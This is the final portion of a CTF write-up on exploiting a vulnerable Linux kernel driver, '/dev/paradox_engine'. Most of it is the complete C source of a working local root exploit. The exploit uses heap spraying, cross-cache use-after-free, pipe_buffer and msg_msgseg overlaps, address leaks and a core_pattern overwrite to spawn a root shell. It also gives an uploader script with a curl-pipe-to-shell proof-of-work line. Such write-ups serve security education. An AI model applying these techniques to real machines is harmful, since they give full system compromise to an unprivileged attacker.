        // Re-entry path: once core_pattern is overwritten, the kernel's
        // core-dump helper re-runs this binary (via /proc/CHILD-PID/fd/666)
        // with the crashing PID as argv[1] — jump straight to the payload.
	if (argc > 1)
	{
		root(argv[1]);
		exit(0);
	}
        // this code is "activated" when core_pattern has been overwritten and triggers a crash
        setvbuf(stdout, 0, 2, 0);
	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
	if (fork() == 0)
	{
		// Child: pin a copy of this ELF to fd 666 via a memfd so it is
		// reachable at /proc/CHILD-PID/fd/666 when the crash fires.
		int memfd = memfd_create("x", 0);
		SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0,
						0xffffffff));
		dup2(memfd, 666);
		close(memfd);
		// wait signal of the finished exploit
		// NOTE(review): dummybuf points at a string literal, so this
		// read() likely fails with EFAULT after unblocking; only the
		// blocking itself provides the synchronization here.
		read(cfd[0], dummybuf, 1);
		// trigger crash
		*(size_t *)0 = 0;
	}
        // ...
        // end of main
        // Push the payload through every sprayed pipe; the one whose
        // pipe_buffer now targets core_pattern's page (with
        // PIPE_BUF_FLAG_CAN_MERGE set) writes it into kernel memory.
        for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        	dprintf(pfds[i][1], "%s", "|/proc/%P/fd/666 %P\n");
    	}
    	printf("[+] Stage 7 done!\n");
    	// show content of core_pattern
	system("cat /proc/sys/kernel/core_pattern");
	// trigger root shell
    	// getchar();
    
    	write(cfd[1], dummybuf, 1);
    	while (1) {
        	sleep(100);
    	}

    	return 0;
}
```

The child process:

* Creates an in-memory file and copies the program's ELF image into it
* Moves it to fd 666, so it is reachable at `/proc/CHILD-PID/fd/666`
* Waits for the parent's signal that the exploit is finished by doing `read(cfd[0], dummybuf, 1)`

When `write(cfd[1], dummybuf, 1)` is executed, the parent signals to the child it is done.

The child then triggers a crash by dereferencing NULL, causing the code which we wrote into `core_pattern` to be executed. This causes the executable at `/proc/CHILD-PID/fd/666` to be executed with an argument, giving us a root shell and reading the flag.

### Compiling and sending the exploit to remote

According to ptr-yudai's [blog post](https://pawnyable.cafe/linux-kernel/introduction/compile-and-transfer.html), it usually works fine if you use `musl-gcc` to compile your exploit code (with the effect of making the binary much smaller), and sending it to remote as base64. However, for some reason my exploit wasn't working once I used `musl-gcc` to compile it. The third LSB to overwrite in the partial-overwrite stage had changed. The exploit worked once I changed that.

I also used the following `uploader.py` (generated by ChatGPT) to automate the PoW solving, sending of base64 and decoding it to the binary:

{% code lineNumbers="true" %}

```python
#!/usr/bin/env python3
from pwn import *
import base64
import subprocess
import re

def solve_pow(pow_command):
    """Run the proof-of-work shell command and return its stdout, or None on failure."""
    log.info(f"Solving PoW: {pow_command}")
    try:
        proc = subprocess.run(pow_command, shell=True, capture_output=True, text=True, timeout=30)
    except Exception as e:
        log.error(f"PoW error: {e}")
        return None
    if proc.returncode != 0:
        log.error(f"PoW failed: {proc.stderr}")
        return None
    answer = proc.stdout.strip()
    log.success(f"PoW solution: {answer}")
    return answer

def run(io, cmd):
    """Send one shell command to the target and consume the echoed line."""
    encoded = cmd.encode()
    io.sendlineafter(b"$ ", encoded)
    io.recvline()

def main():
    """Connect to the challenge, solve any PoW, and upload the exploit binary.

    Reads ./test, base64-encodes it, pushes it over the shell in 512-byte
    chunks, decodes it remotely to /tmp/exploit, then drops to interactive.
    """
    # Configuration
    USE_REMOTE = True  # Set to True for remote
    HOST = "159.223.33.156"
    PORT = 9102
    
    # Read exploit binary
    with open("./test", "rb") as f:
        payload = base64.b64encode(f.read()).decode('ascii')
    
    # Connect
    if USE_REMOTE:
        io = remote(HOST, PORT)
        
        # Handle PoW if present: the banner advertises a pwn.red/pow command
        # whose output must be sent back as the solution
        try:
            initial = io.recvuntil(b"solution:", timeout=5).decode()
            pow_match = re.search(r'curl -sSfL https://pwn\.red/pow \| sh -s ([^\s]+)', initial)
            if pow_match:
                challenge = pow_match.group(1)
                pow_command = f"curl -sSfL https://pwn.red/pow | sh -s {challenge}"
                solution = solve_pow(pow_command)
                if solution:
                    io.sendline(solution.encode())
                else:
                    log.error("Failed to solve PoW")
                    return
        except EOFError:
            pass  # No PoW challenge
    else:
        io = process("./run.sh")
    
    # Upload exploit
    run(io, 'cd /tmp')
    
    log.info("Uploading exploit...")
    # 512-byte chunks keep each echo command within the shell's line limits
    for i in range(0, len(payload), 512):
        progress = f"{i//512 + 1}/{(len(payload) + 511)//512}"
        log.info(f"Uploading chunk {progress}")
        run(io, f'echo "{payload[i:i+512]}" >> b64exp')
    
    log.info("Setting up exploit...")
    run(io, 'base64 -d b64exp > exploit')
    run(io, 'rm b64exp')
    run(io, 'chmod +x exploit')
    
    log.success("Exploit uploaded!")
    io.interactive()

# Script entry point: only run when executed directly, not when imported.
if __name__ == "__main__":
    main()
```

{% endcode %}

### Afterthoughts

Although I spent a really long time on this challenge, in hindsight it was a really good idea to persevere with it. I learnt a ton about the workings of the linux kernel's allocators and numerous linux kernel exploit techniques.&#x20;

### Final code

Note: There is some unused code in here, but if you followed the entire post you should be able to comprehend the code just fine! :smile:

{% code lineNumbers="true" %}

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <sched.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/auxv.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>
#include <semaphore.h>
// #include <linux/msg.h>

#define DEVICE_PATH "/dev/paradox_engine"
#define N_PAGESPRAY                0x200
// Define the size of a cred structure (adjust based on your kernel)
#define CRED_SIZE 168
// Number of children to spawn (cred spray)
#define NUM_CHILDREN 200

// Number of temporal_events to spray
#define NUM_SPRAY 200
#define FORK_SPRAY 320
#define NUM_PIPES 25
#define PIPE_BUF_SIZE 0x64
#define NUM_TASKS 50
#define CRED_JAR_INITIAL_SPRAY 200

#define CLONE_FLAGS CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND

// ioctl commands and structures
#define PARADOX_CREATE_TIMELINE _IOWR('k', 1, struct paradox_timeline_req)
#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

#define PIPE_BUF_SPRAY1 50
#define DUMMY_PIPES 300
#define PIPE_BUF_SPRAY2 50
// original 250
#define NUM_MSGMSG 250

#define SYSCHK(x)                     \
	({                                \
		typeof(x) __res = (x);        \
		if (__res == (typeof(x))-1)   \
			err(1, "SYSCHK(" #x ")"); \
		__res;                        \
	})

// Request layout for the PARADOX_CREATE_TIMELINE ioctl: the caller fills the
// causal (timeline, event) pair; the driver writes back new_timeline_id.
struct paradox_timeline_req {
    uint64_t cause_timeline_id, cause_event_id;
    uint64_t new_timeline_id;
};

// Request layout for the PARADOX_CREATE_EVENT ioctl: the driver writes back
// new_event_id.
struct paradox_event_req {
    uint64_t target_timeline_id;
    uint64_t cause_event_id;
    char description[64];
    uint64_t new_event_id;
};

// Per-thread argument bundle (declared but unused by the final exploit).
typedef struct {
    int thread_id;
    int num_events;
} thread_arg;

// Userspace mirror of the kernel's struct pipe_buffer (x86-64 layout),
// used to interpret and craft the leaked/overwritten pipe_buffer bytes.
// NOTE(review): field layout assumed to match kernel 6.12 — verify against
// the target kernel's headers.
struct pipe_buffer
{
	void *page;
	unsigned int offset, len;
	void *ops;
	unsigned int flags;
	unsigned long private;
};

// https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606
/* Restrict the calling thread to run only on the given CPU core.
 * Fatal (perror + exit) if the affinity call fails. */
static inline void pin_this_thread_to_cpu(int cpu) {
    cpu_set_t mask;
    CPU_ZERO(&mask);
    CPU_SET(cpu, &mask);
    int err_code = pthread_setaffinity_np(pthread_self(), sizeof(mask), &mask);
    if (err_code != 0) {
        errno = err_code;
        perror("pthread_setaffinity_np");
        exit(1);
    }
}

// Print a fatal error message in bold red to stdout and terminate the
// process with status -1 (seen as 255 by the shell).
void errExit(char * msg)
{
    printf("\033[31m\033[1m[x] Error : \033[0m%s\n",msg);
    exit(-1);
}

/* printf-style fatal error helper: formats the message to stderr,
 * appends a newline, then exits with status 1. */
static void die(const char *fmt, ...) {
    va_list args;

    va_start(args, fmt);
    vfprintf(stderr, fmt, args);
    va_end(args);

    fputc('\n', stderr);
    exit(1);
}

static uint64_t dev_create_timeline(int fd, uint64_t cause_timeline_id, uint64_t cause_event_id) {
    struct paradox_timeline_req req;
    memset(&req, 0, sizeof(req));
    req.cause_timeline_id = cause_timeline_id;
    req.cause_event_id = cause_event_id;
    if (ioctl(fd, PARADOX_CREATE_TIMELINE, &req) != 0) die("ioctl CREATE_TIMELINE failed: %s", strerror(errno));
    return req.new_timeline_id;
}

static uint64_t dev_create_event(int fd, uint64_t tlid, uint64_t cause_eid, const char *desc) {
    struct paradox_event_req req;
    memset(&req, 0, sizeof(req));
    req.target_timeline_id = tlid;
    req.cause_event_id = cause_eid;
    snprintf(req.description, sizeof(req.description), "%s", desc ? desc : "e");
    if (ioctl(fd, PARADOX_CREATE_EVENT, &req) != 0) die("ioctl CREATE_EVENT failed: %s", strerror(errno));
    return req.new_event_id;
}

// Send one System V message whose payload is (size - 0x30) bytes filled with
// byte `c`, so the kernel-side msg_msg (0x30-byte header + data) lands in the
// kmalloc cache for `size`. Fatal on msgsnd failure.
// NOTE(review): a variably-sized array member inside a struct is a GNU C
// extension, not standard C11.
void send_msg(int qid, int size, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = 1;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}


#define OBJS_PER_SLAB 36
#define CPU_PARTIAL 120
int fd1, fd2, fd3, fd4, fd5;
sem_t ready;

/*
 * Thread entry: pins itself to CPU 1 and closes fd2 there, so the frees of
 * fd2's device objects happen on CPU 1's slab caches.
 * Fix: correct pthread start-routine signature (void *(*)(void *)) and an
 * explicit return value — the original declared no parameter and fell off
 * the end of a non-void function, which is undefined behavior.
 */
void *freefd2(void *arg) {
    (void)arg;
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
    return NULL;
}

/*
 * Thread entry pinned to CPU 1: fills that CPU's active + partial slabs with
 * temporal_event objects. Even-indexed events go to fd4 (freed later by
 * close(fd4)); odd-indexed ones go to fd3 (never closed) so the slabs stay
 * partially in use.
 * Fix: proper pthread start-routine signature and explicit return (the
 * original fell off the end of a non-void function — UB); the `evt` local
 * whose value was never read is gone.
 */
void *fillcpu1(void *arg) {
    (void)arg;
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list...\n");
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        if (i % 2 == 0) {
            // want to free later
            (void)dev_create_event(fd4, 0, 0, "fd4event-cpu1");
        } else {
            (void)dev_create_event(fd3, 0, 0, "fd3event-cpu1");
        }
    }
    return NULL;
}

/*
 * Thread entry pinned to CPU 1: closes fd4, freeing every event created on
 * it and leaving one free object in each of CPU 1's sprayed slabs.
 * Fix: correct pthread start-routine signature and explicit return value
 * (the original fell off the end of a non-void function — UB).
 */
void *freecpu1(void *arg) {
    (void)arg;
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list (2)...\n");
    close(fd4);
    return NULL;
}

int pipe_fds_2[200][2];

/*
 * Thread entry pinned to CPU 1: creates 200 pipes and enlarges each ring
 * with F_SETPIPE_SZ so the kmalloc'd pipe_buffer arrays can reclaim freed
 * memory on that CPU.
 * Fixes: explicit return value for the pthread start routine (original fell
 * off the end of a non-void function — UB); removed the 0x100-byte buffer
 * that was malloc'd and memset every iteration but never used or freed, and
 * the unused `mult` local.
 */
void *spray_pipe_buf_2(void *arg) {
    (void)arg;
    pin_this_thread_to_cpu(1);
    printf("[+] Spraying pipe_buffer to reclaim victim...\n");

    for (int i = 0; i < 200; i++) {
        int res = pipe(pipe_fds_2[i]);
        if (res < 0) printf("Failed to allocate pipe buffers\n" );
        // pipe max size is 1048576 = 0x100000 = 0x1000 * 0x100;
        // F_SETPIPE_SZ reallocates the pipe_buffer ring from kmalloc
        res = fcntl(pipe_fds_2[i][1], F_SETPIPE_SZ, 0x1000 * 64);
        if (res < 0) {
            printf("fcntl %d failed!\n", i );
        }
    }
    printf("[+] Spray done\n");
    return NULL;
}

int ms_qids[NUM_MSGMSG];
void *spray_msg_msg_seg() {
    // want to reclaim an order 2 page now
    // target kmalloc-cg-1k
    pin_this_thread_to_cpu(1);
    
    for (int i = 0; i < NUM_MSGMSG; i++) {
        ms_qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    // honestly here just pray we reclaim with msg_msgseg and not msg_msg
    // can at most send 0x2000: 
    // ~ $ cat /proc/sys/kernel/msgmax
    // 8192
    struct msgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };

    struct msgbuf *msg = malloc(sizeof(struct msgbuf));
    msg->mtype = 6;
    memset(msg->mtext, 'a', sizeof(msg->mtext));

    for (int i = 0; i < NUM_MSGMSG; i++) {
        int ret = msgsnd(ms_qids[i], msg, sizeof(msg->mtext), 0);
        if (ret < 0) {
            printf("i: %d[x] msgsnd!\n", i);
            return -1;
        }
    }
}

// https://i.blackhat.com/Asia-24/Presentations/Asia-24-Wu-Game-of-Cross-Cache.pdf
// cross cache:
// objs_per_slab = 36
// cpu_partial = 120
// 0. pin to a cpu
// 1. allocate objs_per_slab * (cpu_partial + 1) objs to drain partially-free slabs [2]
// 2. allocate (objs_per_slab - 1) objects as pre-alloc objs [2]
// 3. allocate victim and UAF it [1]
// 4. allocate (objs_per_slab + 1) objects as post-alloc objects [2]
// 5. release all pre-alloc and post-alloc objects [2]
// 6. free one object per slab from step 1 (cpu_partial slabs) to trigger flushing for cpu partial list [2]
// 7. spray with msg_msg to reclaim [2]

/*
 * Park the calling process "forever" (used to keep sprayed children alive).
 * Fix: the original executed a single sleep() and then fell off the end of
 * a non-void function (UB if the return value were used); loop the sleep so
 * the wait also survives signal wakeups.
 */
int just_wait()
{
    for (;;)
        sleep(1000000000);
    return 0; /* unreachable */
}

// Runs when this binary is re-executed as the core_pattern pipe helper.
// `buf` is the "%P" argument: the PID (in the initial namespace) of the
// process that just crashed. We are root here, but our std fds point
// nowhere useful, so we steal the crashing process's fds first.
void root(char *buf)
{
	int pid = strtoull(buf, 0, 10);
	char path[0x100];
	// fix stdin, stdout, stderr
	sprintf(path, "/proc/%d/ns/net", pid);
	// pidfd_getfd duplicates fds 0/1/2 out of the crashed process so our
	// shell is wired to the user's terminal
	int pfd = syscall(SYS_pidfd_open, pid, 0);
	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
	dup2(stdinfd, 0);
	dup2(stdoutfd, 1);
	dup2(stderrfd, 2);
	// just cat the flag
	system("cat /flag; /bin/sh");
}

int cfd[2];
char* dummybuf = "abcd";

int main(int argc, char **argv) {
    // if it called from triggerred crash from core pattern
	if (argc > 1)
	{
		root(argv[1]);
		exit(0);
	}
    // this code is "activated" when core_pattern has been overwritten and triggers a crash
    setvbuf(stdout, 0, 2, 0);
	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
	if (fork() == 0)
	{
		// child: keep our own ELF reachable at /proc/<pid>/fd/666, then wait
		// for the parent's signal and crash to fire the core_pattern helper
		int memfd = memfd_create("x", 0);
		SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0,
						0xffffffff));
		dup2(memfd, 666);
		close(memfd);
		// wait signal of the finished exploit
		read(cfd[0], dummybuf, 1);
		// trigger crash
		*(size_t *)0 = 0;
	}

    pin_this_thread_to_cpu(0);
    fd1 = open(DEVICE_PATH, O_RDONLY); // for cpu0 pre-alloc obj, post-alloc obj and the partial page objs to be freed
    fd2 = open(DEVICE_PATH, O_RDONLY); // uncontrollable infinite loop
    fd3 = open(DEVICE_PATH, O_RDONLY); // fd3 is never closed
    fd4 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
    fd5 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
    // getchar();
    if (fd1 < 0 || fd2 < 0) die("open /dev/paradox_engine");
    printf("[+] devices opened\n");
    printf("[+] creating events...\n");
    // drain partially-free slabs
    
    // for (int i = 0; i < 34; i++) {
    //     uint64_t evt;
    //     evt = dev_create_event(fd2, 1, 0, "fd2event-pre");
    //     if (evt < 0) printf("[x] evt!");
    // }
    // uint64_t togotocpu0[CPU_PARTIAL * 2];
    // for (int i = 0; i < CPU_PARTIAL * 2; i++) {
    //     uint64_t evt;
    //     evt = dev_create_event(fd1, 0, 0, "to_go_into_cpu0");
    //     if (evt < 0) printf("[x] evt!");
    //     togotocpu0[i] = evt;
    // }

    // cross-cache step 1 (CPU 0): allocate OBJS_PER_SLAB * (CPU_PARTIAL + 1)
    // events, remembering one fd1-owned event per slab to free later
    uint64_t partiallyfrees[CPU_PARTIAL + 1];
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd1, 0, 0, "fd1event-cpu0");
            partiallyfrees[i / OBJS_PER_SLAB] = evt;
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu0");
        }
        if (evt < 0) printf("[x] evt!");
    }

    pthread_t t1;
    pthread_create(&t1, NULL, fillcpu1, NULL);
    pthread_join(t1, NULL);
    printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

    for (int i = 0; i < (CPU_PARTIAL + 1); i++) {
        uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
        if (tl < 0) printf("[x] tl!");
    }
    
    // cross-cache step 2: pre-alloc objects fill the current active slab
    uint64_t preallocs[OBJS_PER_SLAB - 1];
    printf("[+] Creating pre-alloc objects\n");
    for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
        // pre-alloc objects
        uint64_t evt;
        if (i % 2) {
            evt = dev_create_event(fd1, 0, 0, "pre-alloc object");
        } else {
            evt = dev_create_event(fd5, 0, 0, "pre-alloc object");
        }
        if (evt < 0) printf("[x] evt!");
        preallocs[i] = evt;
    }

    // cross-cache step 3: the victim object that gets UAF'd when fd2 closes
    printf("[+] creating self-referential event...\n");
    uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
    printf("[+] self-ref event created: e0=%llu\n", e0);
    
    // cross-cache step 4: post-alloc objects finish off the victim's slab
    printf("[+] Creating post-alloc objects\n");
    uint64_t postallocs[OBJS_PER_SLAB + 1];

    for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
        uint64_t evt;
        if (i % 2) {
            evt = dev_create_event(fd1, 0, 0, "post-alloc object");
        } else {
            evt = dev_create_event(fd5, 0, 0, "post-alloc object");
        }
        if (evt < 0) printf("[x] evt!");
        postallocs[i] = evt;
    }

    // cross-cache steps 5-6: release pre/post-alloc objects and one object
    // per partial slab to flush the cpu partial list
    close(fd5);
    // pause();
    pthread_t t2;
    pthread_create(&t2, NULL, freecpu1, NULL);
    pthread_join(t2, NULL);
    printf("[+] Freeing self-referential event...\n");
    pthread_t t;
    pthread_create(&t, NULL, freefd2, NULL);
    // sleep(5); // bro...
    // block until the other thread enters
    sleep(1);
    printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
    close(fd1);
    
    int cpu  = sched_getcpu(); 
    printf("[+] Main thread running on cpu %d\n", cpu);
    printf("[+] About to spray...\n");
    // getchar();
    // spray pipe data pages of increasing size until one overlaps the UAF'd
    // event — detected when the device flips a byte of our written pattern
    printf("[+] Spraying pipe buffer...\n");
    int pipe_fds[NUM_PIPES][2];
    int ret = 0;
    int found = 0;
    size_t cursize = 0x10;
    int changed_pipe = -1;
    // getchar();
    for (int i = 0; i < (0x1000 / 0x10); i++) {
        // printf("i: %d\n", i);
        char* buf = malloc(cursize);
        memset(buf, '\x00', cursize);
        for (int j2 = 0; j2 + 8 < cursize; j2 += 0x10) {
            buf[j2 + 8] = '\x01';
        }
        // create pipes and write contents
        for (int j = 0; j < NUM_PIPES; j++) {
            // printf("j: %d\n", j);
            int res = pipe(pipe_fds[j]);
            if (res < 0) printf("Failed to allocate pipe buffers\n" );
            ret = write(pipe_fds[j][1], buf, cursize);
            if (ret < 0) {
                printf("[x] Write!\n");
                return -1;
            }
        }
        // check if any pipes had content changed
        for (int j = 0; j < NUM_PIPES; j++) {
            // printf("j2: %d\n", j);
            char* recvbuf = malloc(cursize);
            usleep(10); // transfer control to other thread
            ret = read(pipe_fds[j][0], recvbuf, cursize);
            if (ret < 0) {
                printf("[x] Read!\n");
                return -1;
            }
            if (memcmp(recvbuf, buf, cursize) != 0) {
                printf("We got lucky! Pipe %d had content changed!\n", j);
                changed_pipe = j;
                printf("Expected: ");
                for (int k = cursize - 0x8; k < cursize; k++) {
                    printf("%02x ", (unsigned char)buf[k]);
                }
                printf("\nGot:      ");
                for (int k = cursize - 0x8; k < cursize; k++) {
                    printf("%02x ", (unsigned char)recvbuf[k]);
                }
                printf("\n");
                found = 1;
                break;
            }
        }
        if (found) {
            break;
        }
        // close all pipes
        for (int j = 0; j < NUM_PIPES; j++) {
            close(pipe_fds[j][1]);
            close(pipe_fds[j][0]);
        }
        cursize += 0x10;
    }
    // NOTE(review): `found` is only ever 0 or 1, so this error path can never
    // trigger; it likely should test `!found`
    if (found == -1) {
        printf("Victim pipe not found!\n");
        return -1;
    }
    /* 
    now we know the object's offset in the page, i.e. 0x...??0

      Now we overwrite the refcount with 1 and partially overwrite the pointer for a
      page kfree
    */
    printf("[+] Pre-stage 1\n");
    // getchar();
    printf("[+] Stage 1: Spraying pipe_buffer to claim order 10 page...\n");
    // getchar();
    int pfds[PIPE_BUF_SPRAY1][2];
    char* filler1 = malloc(0x1000);
    memset(filler1, 'A', 0x1000);
    int res;
    // stage 1: reclaiming order 10 pages using enlarged pipe_buffer structs
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        res = pipe(pfds[i]);
        if (res < 0) {
            printf("Failed to allocate pipe buffers\n" );
            return -1;
        }
        // enlarge
        // we can spray at most around 60 of these before we get cooked
        res = fcntl(pfds[i][1], F_SETPIPE_SZ, 0x1000 * 0x100);
        if (res < 0) {
            printf("fcntl %d failed!\n", i );
            return -1;
        }
        // write into bufs[0]
        res = write(pfds[i][1], filler1, 1);
        if (res < 0) {
            printf("write failed!\n" );
            return -1;
        }
    }
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        // set the first pipe_buf's op field to NULL
        // at the same time, set its pipe_buffer->offset = temporal_event->refcount = 1 :)
        read(pfds[i][0], filler1, 1);
    }
    printf("[+] Stage 1 done!\n");
    // stage 2 may crash if we were unlucky in step 1
    printf("[+] Stage 2: Using partial overwrite to free page...\n");
    // need to spray enough to push the victim pipe into free_area instead of cpu1 ?
    int dummy_pipes[DUMMY_PIPES][2];
    for (int i = 0; i < DUMMY_PIPES; i++) {
        int res = pipe(dummy_pipes[i]);
        if (res < 0) {
            printf("Failed to create pipe %d\n", i);
            break;
        }
    }
    for (int i = 0; i < DUMMY_PIPES; i++) {
        res = write(dummy_pipes[i][1], "a", 1);
        if (res < 0) {
            printf("Failed to write to pipe %d\n", i);
            break;
        }
        close(dummy_pipes[i][1]);
        close(dummy_pipes[i][0]);
    }
    close(pipe_fds[changed_pipe][1]);
    close(pipe_fds[changed_pipe][0]);
    usleep(1000);
    // getchar();
    // craft the UAF write: set the victim's refcount to 1, then partially
    // overwrite the third byte of its pointer so the kernel frees a whole page
    char* buf = malloc(cursize + 3);
    memset(buf, '\x00', cursize + 3);
    buf[cursize - 0x8] = '\x01'; // refcount
    // buf[cursize + 2] = '\xa0';
    buf[cursize + 2] = '\x60';
    
    int stage_2_pipes[PIPE_BUF_SPRAY2][2];
    for (int i = 0; i < PIPE_BUF_SPRAY2; i++) {
        // printf("i: %d\n", i);
        int res = pipe(stage_2_pipes[i]);
        if (res < 0) {
            printf("Failed to allocate pipe buffers %d\n", i);
            break;
        } 
        ret = write(stage_2_pipes[i][1], buf, cursize + 3);
        if (ret < 0) {
            printf("[x] Write!\n");
            break;
        }
    }
    printf("[+] Stage 2 done!\n");
    getchar();
    printf("[+] Stage 3: Spraying msg_msgseg to reclaim page in cpu 1... (if this step hangs just re-run)\n");
    pthread_t t3;
    pthread_create(&t3, NULL, spray_msg_msg_seg, NULL);
    pthread_join(t3, NULL);
    printf("[+] Stage 3 done!\n");
    printf("[+] Stage 4: Initializing pipe_buffer to prepare for leaks...\n");
    // get vDSO addr
	size_t *vvar = ((size_t *)getauxval(AT_SYSINFO_EHDR));
	struct iovec iov = {vvar, 1};
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        // res = write(pfds[i][1], filler1, 1);
        // if (res < 0) {
        //     printf("write failed!\n" );
        //     return -1;
        // }
        // vmsplice trick
        SYSCHK(vmsplice(pfds[i][1], &iov, 1, 0));
    }
    printf("[+] Stage 4 done!\n");
    // getchar();
    printf("[+] Stage 5: Leaking heap addresses using msg_msgseg and pipe_buffer overlap...\n");
    int victim_msqid = -1;
    struct leakmsgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };
    struct leakmsgbuf *leakmsg = malloc(sizeof(struct leakmsgbuf));
    leakmsg->mtype = 6;
    memset(leakmsg, 0, sizeof(struct leakmsgbuf));
    char* correct_buf = malloc(0x1000-0x30-0x8+0x400);
    memset(correct_buf, 'a', 0x1000-0x30-0x8+0x400);
    struct pipe_buffer *p;
    for (int i = 0; i < NUM_MSGMSG; i++) {
        // read msg without freeing memory
        ret = msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);
        if (ret < 0) {
            perror("msgrcv"); 
            continue;
        }
        if (memcmp(leakmsg->mtext, correct_buf, 0x1000-0x30-0x8+0x400) != 0) {
            msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 6, 0);
            victim_msqid = ms_qids[i];
            printf("[+] Victim found! msqid: %d\n", victim_msqid);
            // print victim data
            for (int i = 0x1000-0x30-0x8+0x28; i < 0x1000-0x30-0x8+0x40; i++) {
                printf("%02x ", leakmsg->mtext[i]);
            }
            printf("\n");
            p = (void *)&leakmsg->mtext[0x1000 - 0x30 - 0x8 + 0x28];
            break;
        }
    }
    /*
    no kaslr leaks : 
    - page leak: 0xffffea00000cf400
    - pipe_buf_ops leak: 0xffffffff82c6fe80

    kernel text:   0xffffffff81000000-0xffffffff82800000 (0x1800000 bytes)
    kernel rodata: 0xffffffff82800000-0xffffffff83497000 (0xc97000 bytes)
    kernel data:   0xffffffff83600000-0xffffffff8419d000 (0xb9d000 bytes)

        struct pipe_buffer {
            void *page;
            unsigned int offset, len;
            void *ops;
            unsigned int flags;
            unsigned long private;
        };
    */
    if (victim_msqid == -1) {
        printf("Victim msqid not found!\n");
        return -1;
    }
    void *page_leak;
    memcpy(&page_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x28, sizeof(void *));
    void *pipe_buf_ops_leak;
    memcpy(&pipe_buf_ops_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x38, sizeof(void *));
    printf("page leak: %p\n", page_leak);
    printf("pipe_buf_ops leak: %p\n", pipe_buf_ops_leak);
    printf("[+] Stage 5 done!\n");
    getchar();
    printf("[+] Stage 6: Overwriting pipe_buffer->page to point to core_pattern's page...\n");
    // modify struct page that will represent of `core_pattern`'s page
    // p->page was originally pointing vdso_image_64.data.
    // gef> p (void*)vdso_image_64
    // $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
    // gef> p &core_pattern
    // $1 = (<data variable, no debug info> *) 0xffffffff83808a60
    // gef> p 0xffffffff83808a60-0xffffffff833d0000
    // $3 = 0x438a60
    // the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x438000
    // every 4096 byte page, there is a 64 byte struct page* stored in vmemmap, 
    // so to calculate the difference between struct page* addresses, you have to do: 0x438000 / 4096 * 64 which equals to 0x863000 >> 6
    // (right shift by 12 bits and left shift by 6 bits)
    p->page += (0x438000 >> 6);
    // Since p->len == 1, we need to subtract one on p->offset
    p->offset = 0xa60 - 1;
    p->flags = 0x10; // PIPE_BUF_FLAG_CAN_MERGE, apply every pipe write to the page
    leakmsg->mtype = 7;
    // overwrite the pipe_buffer with msg_msg_seg (with our own modified pipe_buffer content)
    int payload_msqids[0x100];
    for (int i = 0; i < 0x100; i++) {
        payload_msqids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    for (int i = 0; i < 0x100; i++) {
        ret = msgsnd(payload_msqids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0);
        if (ret < 0) {
            printf("[x] msgsnd %d!\n", i);
            return -1;
        }
    }
    printf("[+] Stage 6 done!\n");
    printf("[+] Stage 7: Overwriting core_pattern by writing into pipe_buffer...\n");
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        dprintf(pfds[i][1], "%s", "|/proc/%P/fd/666 %P\n");
    }
    printf("[+] Stage 7 done!\n");
    // show content of core_pattern
	system("cat /proc/sys/kernel/core_pattern");
	// trigger root shell
    // getchar();
    
    write(cfd[1], dummybuf, 1);
    while (1) {
        sleep(100);
    }

    return 0;
}   

```

{% endcode %}
